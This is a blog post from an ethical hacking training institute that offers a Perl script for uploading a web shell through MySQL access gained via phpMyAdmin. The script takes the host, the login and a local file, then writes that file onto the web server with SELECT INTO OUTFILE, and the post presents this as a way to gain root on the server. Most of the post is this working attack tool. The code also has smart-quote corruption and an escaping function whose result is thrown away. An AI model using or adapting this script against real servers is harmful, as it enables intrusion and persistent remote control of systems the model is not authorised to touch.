Phpmyadmin Shell Upload Program in perl -

Extreme Hacking
Advanced Ethical Hacking Institute in Pune

While going through are CEH labs, one of our student as that what if he got access to a phpmyadmin portal, is it possible to root the server or upload a shell so that he gets a access of the full web server? And my answer was big yeesss.

So here is the process alogo code written in perl that will help in getting the root of web server. Go through the code understand the logical flow and create a new one for yourself. If you find any difficulty in understanding the logical flow shoot your query to sadik.shaikh@extremehacking.org.

Code:
#!/usr/bin/perl

use strict;
use warnings;
use DBI;
use DBD::mysql;
use IO::File;
use Term::ANSIColor qw(:constants);

sub main(){
print BOLD BLUE,”\n[*]”,RESET,” Phpmyadmin shell upload by Team Arizona”;
print “\n\n\n”;
print BOLD BLUE,”[*]”,RESET,” Host: “;
chomp(my $host = <stdin>);
print BOLD BLUE,”[*]”,RESET,” User: “;
chomp(my $user = <stdin>);
print BOLD BLUE,”[*]”,RESET,” Password: “;
chomp(my $pass = <stdin>);
print BOLD BLUE,”[*]”,RESET,” File of text , which will be uploaded to host : “;
chomp(my $arq = <stdin>);
print BOLD BLUE,”[*]”,RESET,” Path of site+Name of the final file: “;
chomp(my $path = <stdin>);

my $dsn = “dbi:mysql::$host:3306″;
my $dbh = DBI->connect($dsn, $user, $pass,{
PrintError => 0,
RaiseError => 0
});
if(!$dbh) { die(BOLD RED,”\n[-]”,RESET,” Connection error\n\n”); }

my $f = new IO::File;
$f->open(“<$arq”) or die $!;
my @file = <$f>;
chomp(@file);
my $text = join(”,@file);
chomp($text);
&AddSlashes($text);
$f->close;

my $sth = $dbh->prepare(‘SELECT “‘ . $text . ‘” INTO OUTFILE “‘.$path.'”‘);
if(!$sth->execute()){
print BOLD RED “\n[-]”,RESET,” Failed to make file\n\n”;
exit;
} else {
print GREEN “\n[+]”,RESET,” File are create !!!\n\n”;
exit;
}
}

sub AddSlashes()
{
my $text = shift;
$text =~ s/\\/\\\\/g;
$text =~ s/’/\\’/g;
$text =~ s/”/\\”/g;
$text =~ s/\\0/\\\\0/g;
return $text;
}

&main();

www.extremehacking.org
CEHv9 CHFIv9 ECSAv9 CAST ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE,Certified Ethical Hacking, Center For Advanced Security Training in India,IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune

Recent Posts

Archives

Categories

Pages

Extreme Hacking